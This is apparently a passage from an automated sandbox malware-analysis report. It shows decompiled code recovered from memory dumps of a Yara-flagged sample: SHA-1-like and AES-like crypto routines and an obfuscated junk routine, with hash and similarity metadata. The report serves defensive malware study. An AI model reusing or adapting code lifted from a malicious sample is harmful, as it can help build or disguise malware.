                                  					_v16 = _t358;
                                  					_t365 = _v12;
                                  					_v12 = _t420;
                                  					asm("rol edx, 0x5");
                                  					asm("ror ecx, 0x2");
                                  					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
                                  					_t423 = _v12;
                                  					_v8 = _t334;
                                  					_v8 = _t365;
                                  					_v12 = _t292;
                                  					asm("rol eax, 0x5");
                                  					_t464 = _t464 + 5;
                                  					_t358 = _v12;
                                  					asm("ror edx, 0x2");
                                  					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
                                  					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
                                  					_t295 = _v8;
                                  					_v8 = _t423;
                                  					_v12 = _t506;
                                  					asm("rol esi, 0x5");
                                  					_t404 = _v8;
                                  					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
                                  					_v16 = _t295;
                                  					_t279 = _v12;
                                  					asm("ror ecx, 0x2");
                                  					_v12 = _t499;
                                  				} while (_t464 < 0x28);
                                  				_v8 = 0x28;
                                  				do {
                                  					asm("rol esi, 0x5");
                                  					_v16 = _t404;
                                  					asm("ror eax, 0x2");
                                  					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
                                  					_t470 = _v12;
                                  					_v12 = _t510;
                                  					asm("rol esi, 0x5");
                                  					_t340 = _v8;
                                  					asm("ror edi, 0x2");
                                  					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
                                  					_v16 = _t358;
                                  					_t369 = _v12;
                                  					_v12 = _t432;
                                  					asm("rol edx, 0x5");
                                  					_v8 = _t279;
                                  					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
                                  					asm("ror ecx, 0x2");
                                  					_v16 = _v8;
                                  					_t299 = _v12;
                                  					_v8 = _t470;
                                  					_v12 = _t434;
                                  					asm("rol edx, 0x5");
                                  					asm("ror eax, 0x2");
                                  					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
                                  					_v16 = _v8;
                                  					_t437 = _t369;
                                  					_t358 = _v12;
                                  					_v8 = _t437;
                                  					_v12 = _t522;
                                  					asm("rol esi, 0x5");
                                  					_v16 = _v8;
                                  					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
                                  					_t404 = _t299;
                                  					_t279 = _v12;
                                  					asm("ror ecx, 0x2");
                                  					_v12 = _t499;
                                  					_t341 = _t340 + 5;
                                  					_v8 = _t341;
                                  				} while (_t341 < 0x3c);
                                  				_t478 = 0x3c;
                                  				_v8 = 0x3c;
                                  				do {
                                  					asm("rol esi, 0x5");
                                  					_t479 = _v8;
                                  					asm("ror eax, 0x2");
                                  					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
                                  					_t346 = _v12;
                                  					_v16 = _t404;
                                  					_v12 = _t525;
                                  					asm("rol esi, 0x5");
                                  					asm("ror ebx, 0x2");
                                  					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
                                  					_v16 = _t358;
                                  					_t370 = _v12;
                                  					_v12 = _t445;
                                  					asm("rol edx, 0x5");
                                  					_v16 = _t279;
                                  					asm("ror ecx, 0x2");
                                  					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
                                  					_t404 = _v12;
                                  					_v12 = _t303;
                                  					asm("rol eax, 0x5");
                                  					_v16 = _t346;
                                  					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
                                  					_t305 = _t370;
                                  					_v8 = _t346;
                                  					asm("ror edx, 0x2");
                                  					_v8 = _t370;
                                  					do {
                                  						_t536 =  &_v5;
                                  						_t544 = _t536;
                                  						asm("cld");
                                  						_t358 = _v12;
                                  						_v12 = _t532;
                                  					} while (_t544 != 0);
                                  					asm("rol esi, 0x5");
                                  					_t478 = _t479 + 5;
                                  					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
                                  					_v16 = _t305;
                                  					_t279 = _v12;
                                  					asm("ror ecx, 0x2");
                                  					_v8 = _t404;
                                  					_v12 = _t499;
                                  					_v8 = _t478;
                                  				} while (_t478 < 0x50);
                                  				_t480 = _a4;
                                  				_t480[2] = _t480[2] + _t358;
                                  				_t480[3] = _t480[3] + _t404;
                                  				_t311 = _t480[4] + _v16;
                                  				 *_t480 =  *_t480 + _t499;
                                  				_t480[1] = _t480[1] + _t279;
                                  				_t480[4] = _t311;
                                  				_t480[0x17] = 0;
                                  				return _t311;
                                  			}

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: (
                                  • API String ID: 0-3887548279
                                  • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                  • Instruction ID: e45bde07df2f29c9c6167222d4a7b9819c0d72dab568059c5b9042f1363b28d4
                                  • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                  • Instruction Fuzzy Hash: 68022DB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID:
                                  • String ID: @
                                  • API String ID: 0-2766056989
                                  • Opcode ID: e85e90dd0b9719a55dab1c0663965b7d6b93435695341bc7a92dc58d0e854178
                                  • Instruction ID: f36fc4e06454e1d05414a64ae4fc517488056c5c2694bce71f5d8f9965ad063f
                                  • Opcode Fuzzy Hash: e85e90dd0b9719a55dab1c0663965b7d6b93435695341bc7a92dc58d0e854178
                                  • Instruction Fuzzy Hash: 3ED13771D0521ADFDF28CFD9C5866BDBBB1FB45318F64842ED812B6640E7349A42CB88
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID: 0-3916222277
                                  • Opcode ID: a86a471240d63b756315390846a9825581feb64457ed57bd18ae8d5564023616
                                  • Instruction ID: aa18094e7312bccfc3bd00b9f8c8421061aea87536dfe76891c9de7903e7a340
                                  • Opcode Fuzzy Hash: a86a471240d63b756315390846a9825581feb64457ed57bd18ae8d5564023616
                                  • Instruction Fuzzy Hash: 8FA12371A442497AEF38CE68CC40BFE3BA5BF49318F4404A9F946DA1D1DB74C990CB29
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID: 0-3916222277
                                  • Opcode ID: a8012d96f25005f0b74bb2d48f07e53518960ef7b0e66479764d01430dc5a56e
                                  • Instruction ID: bbaa47c08b7e97f0c320745782b6829df46fbe1828fd2ff3903043fd6a16fdc6
                                  • Opcode Fuzzy Hash: a8012d96f25005f0b74bb2d48f07e53518960ef7b0e66479764d01430dc5a56e
                                  • Instruction Fuzzy Hash: 1281E673E01114DBDF69CE69C8946BD7B61FF8836CF158229DA16AB2C4D730E941CB88
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bf3aace0eee00dd7d8b9421bd2df7728fa7323d9af3e0e213de9131a621edcaa
                                  • Instruction ID: 8105c557ab85b7292f4c61937c43d24a40909692a6b6dd5c4a593eb44872254c
                                  • Opcode Fuzzy Hash: bf3aace0eee00dd7d8b9421bd2df7728fa7323d9af3e0e213de9131a621edcaa
                                  • Instruction Fuzzy Hash: 6C128273B716180BC344CD7DCC852C27293ABD452875FCA3CAD68CB706F66AED1A6684
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 90d3f469960bd276159c6ed70d048ce773126db8986d193b2bd552659773e7e8
                                  • Instruction ID: 9360ba750659f9794645f78d6b074d2f6fe9daff5d14b234b8488c9a1ebc7b5a
                                  • Opcode Fuzzy Hash: 90d3f469960bd276159c6ed70d048ce773126db8986d193b2bd552659773e7e8
                                  • Instruction Fuzzy Hash: D6228771D00218DFDB24CF98C884AEDBBF1FF49314F15816AE888AB391D775A985CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e09b156b8a501b194594bfd83367e5389dd85d5eadd884405b686d64928b303d
                                  • Instruction ID: 1aaf78a83b5b5f3558b0eb0c931a0e9edebb095e9ca66476a9b506fa70072e4e
                                  • Opcode Fuzzy Hash: e09b156b8a501b194594bfd83367e5389dd85d5eadd884405b686d64928b303d
                                  • Instruction Fuzzy Hash: D302A433D69BB34B4B714EB940F262E7EA06E0259470F87E9DCC07F686C212DD0996E4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 51c668c516df592cf3ab0b3750151479ebae755d4a30b30d08630dbe41507220
                                  • Instruction ID: 38fe71afd0d09f532a6aaf4464419c63cb474d69d5feeba415f4fc80e3baf3c8
                                  • Opcode Fuzzy Hash: 51c668c516df592cf3ab0b3750151479ebae755d4a30b30d08630dbe41507220
                                  • Instruction Fuzzy Hash: 7C129F70204AB1DADB68CF29C4947B5B7E0EF05304F0488A9E8D68B796D335E45ACFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0ddfa4334b32a9b1189f38281be8a174f78f46c8b32aed053401b6e198ead280
                                  • Instruction ID: c6b010a590d48f6927af8497827693fedfdf73892ae34936c0d58222db2e699a
                                  • Opcode Fuzzy Hash: 0ddfa4334b32a9b1189f38281be8a174f78f46c8b32aed053401b6e198ead280
                                  • Instruction Fuzzy Hash: C502AE7091012A9ECF389F58C8887B9BBB1FF04314F6440EAE949E6190E7748ED1CF99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 26%
                                  			E72482FB0(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
                                  				signed int _v8;
                                  				signed int _v12;
                                  				signed int _v16;
                                  				signed int _v20;
                                  				signed int _v24;
                                  				void* _t273;
                                  				signed int _t274;
                                  				signed int _t282;
                                  				signed int* _t358;
                                  				signed int _t383;
                                  				signed int* _t409;
                                  				signed int _t429;
                                  				signed int _t458;
                                  				signed int _t478;
                                  				signed int _t560;
                                  				signed int _t603;
                                  
                                  				_t273 = __eax;
                                  				asm("ror edi, 0x8");
                                  				asm("rol edx, 0x8");
                                  				_t458 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
                                  				asm("ror ebx, 0x8");
                                  				asm("rol edx, 0x8");
                                  				_v20 = _t458;
                                  				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
                                  				asm("ror ebx, 0x8");
                                  				asm("rol edx, 0x8");
                                  				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
                                  				asm("ror esi, 0x8");
                                  				asm("rol edx, 0x8");
                                  				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
                                  				asm("ror edx, 0x10");
                                  				asm("ror esi, 0x8");
                                  				asm("rol esi, 0x8");
                                  				_v24 = _t282;
                                  				_t429 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
                                  				asm("ror esi, 0x10");
                                  				asm("ror ebx, 0x8");
                                  				asm("rol ebx, 0x8");
                                  				_t603 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
                                  				asm("ror ebx, 0x8");
                                  				asm("ror edi, 0x10");
                                  				asm("rol edi, 0x8");
                                  				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
                                  				asm("ror edi, 0x10");
                                  				asm("ror ebx, 0x8");
                                  				asm("rol ebx, 0x8");
                                  				_t409 =  &(__ecx[8]);
                                  				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
                                  				_t478 = (_a4 >> 1) - 1;
                                  				_a4 = _t478;
                                  				if(_t478 != 0) {
                                  					do {
                                  						asm("ror edi, 0x10");
                                  						asm("ror ebx, 0x8");
                                  						asm("rol ebx, 0x8");
                                  						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
                                  						asm("ror edi, 0x10");
                                  						asm("ror ebx, 0x8");
                                  						asm("rol ebx, 0x8");
                                  						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
                                  						asm("ror ebx, 0x8");
                                  						asm("ror edi, 0x10");
                                  						asm("rol edi, 0x8");
                                  						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
                                  						asm("ror edi, 0x10");
                                  						asm("ror edx, 0x8");
                                  						asm("rol edx, 0x8");
                                  						_v24 = _t383;
                                  						_t560 =  *(__eax + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
                                  						asm("ror edx, 0x10");
                                  						asm("ror esi, 0x8");
                                  						asm("rol esi, 0x8");
                                  						_t429 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t560 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
                                  						asm("ror esi, 0x10");
                                  						asm("ror ebx, 0x8");
                                  						asm("rol ebx, 0x8");
                                  						_t603 =  *(__eax + 4 + (_t560 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
                                  						_v12 = _t560;
                                  						asm("ror edi, 0x8");
                                  						asm("ror ebx, 0x10");
                                  						asm("rol ebx, 0x8");
                                  						_v16 =  *(__eax + 4 + (_t560 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
                                  						asm("ror ebx, 0x10");
                                  						asm("ror edi, 0x8");
                                  						asm("rol edi, 0x8");
                                  						_t409 =  &(_t409[8]);
                                  						_t205 =  &_a4;
                                  						 *_t205 = _a4 - 1;
                                  						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
                                  					} while ( *_t205 != 0);
                                  				}
                                  				asm("ror ebx, 0x8");
                                  				asm("rol edi, 0x8");
                                  				 *_a8 = (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
                                  				asm("ror ebx, 0x8");
                                  				asm("rol edi, 0x8");
                                  				_a8[1] = (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
                                  				asm("ror ebx, 0x8");
                                  				asm("rol edi, 0x8");
                                  				_t358 = _a8;
                                  				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
                                  				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
                                  				asm("ror ecx, 0x8");
                                  				asm("rol edi, 0x8");
                                  				_t358[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0x00ff00ff;
                                  				return _t274;
                                  			}




















                                  Memory Dump Source
                                  • Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true
                                  Yara matches

                                  C-Code - Quality: 41%
                                  			E7249BABE() {
                                  				char _t72;
                                  				signed int _t74;
                                  				signed char _t75;
                                  				signed char _t79;
                                  				signed int _t82;
                                  				signed int _t84;
                                  				signed int _t89;
                                  				signed int _t92;
                                  				signed int _t97;
                                  				intOrPtr _t99;
                                  				intOrPtr _t100;
                                  
                                  				asm("lodsd");
                                  				_pop( *0x6709f12f);
                                  				_push( *0xdc3f399b);
                                  				asm("adc [0x3874878c], esi");
                                  				asm("adc ch, 0x3a");
                                  				_push( *0xdf1b0695);
                                  				asm("rol dword [0x2d58be39], 0x60");
                                  				asm("rol byte [0x5b16408a], 0x6f");
                                  				 *0xd46dc3b3 = _t72;
                                  				_pop(_t82);
                                  				_push( *0xcf2a8d21);
                                  				 *0xde69c888 =  *0xde69c888 | 0x0db55219;
                                  				_t100 =  *0x430e7f91;
                                  				 *0x430e7f91 = _t99;
                                  				_t97 =  *0x7ed727bf |  *0xe823781b;
                                  				asm("sbb bh, [0x6b4b0686]");
                                  				_push(0xe9e54f94);
                                  				 *0x2b47600e =  *0x79e4223f;
                                  				asm("sbb al, 0xe5");
                                  				asm("scasb");
                                  				_t74 = _t72 +  *0x379309f2 - 0xe90dd1d4;
                                  				_t84 = (_t82 |  *0x5076f9c8) ^  *0x23b0de12;
                                  				asm("adc esi, [0x36b36cc2]");
                                  				asm("sbb [0xf4a864ec], edi");
                                  				_t79 = (_t75 & 0x000000b1 | 0x7982a78d) &  *0xbc0281e &  *0xd15981a2;
                                  				asm("cmpsb");
                                  				if((_t74 & 0x127b13db) != 0) {
